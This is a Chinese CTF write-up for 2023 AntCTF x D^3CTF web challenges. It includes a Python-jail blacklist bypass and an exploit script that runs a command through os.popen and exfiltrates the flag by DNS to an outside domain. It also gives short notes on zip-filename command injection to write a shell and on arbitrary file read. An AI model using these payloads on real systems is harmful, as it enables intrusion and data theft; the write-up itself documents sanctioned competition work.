2023 AntCTF x D^3CTF 亚军 Writeup By S1uM4i

common.docs_name - LarkCCM_Docs_Menu_Image

1.
Web​

1.1
Escape Plan​

黑名单如下:

代码块

black_char = [​
    "'", '"', '.', ',', ' ', '+',​
    '__', 'exec', 'eval', 'str', 'import',​
    'except', 'if', 'for', 'while', 'pass',​
    'with', 'assert', 'break', 'class', 'raise',​
    '0', '1', '2', '3', '4', '5', '6', '7', '8', '9',​
]​

1.
禁用字母，使用全角符号绕过​

2.
禁用数字，使用 len(black_list) len([]) 拿到​

3.
repr(request) 拿到字符串，再使用数组切片进行截取​

代码块

import requests​
import base64​
shell='ping -c 1 `/readflag`.c17fafb7.dns.dnsmap.org'​
s=''​
for i in shell:​
    s+="chr("+str(ord(i))+")+"​
print(s[0:-1])​
payload = payload = "__import__('os').popen({})".format(s[0:-1])​
payload1 = "ᵉxec(repr(request)[(len(black_char[len([])])<<(len(black_char[len([])])))|(len(black_char[len([])])<<(len(black_char[len([])])<<len(black_char[len([])])))|(len(black_char[len([])])<<(len(black_char[len([])])<<len(black_char[len([])])<<len(black_char[len([])])|len(black_char[len([])]))):len(repr(request))-int(black_char[len(black_char)-len(black_char[len([])])])])"​
data = {"cmd": base64.b64encode(payload1.encode('utf-8')).decode('utf-8')}​
url='http://47.102.115.18:30634/?'+payload​
response=requests.post(url=url,data=data)​
print(response.text)​

1.2
d3cloud​

admin/admin 登录 http://106.14.124.130:30050/admin/auth/login

插件里面看到 FilesystemAdapter.php，putFileAs 函数中 unzip 操作存在命令注入漏洞​

控制 zip 文件名，写 shell 拿 flag

1.3
d3node​

页面源码提示了 /dashboardIndex/getHint2，存在任意文件读取

2023 AntCTF x D^3CTF 亚军 Writeup By S1uM4i​

2023 AntCTF x D^3CTF 亚军 Writeup By S1uM4i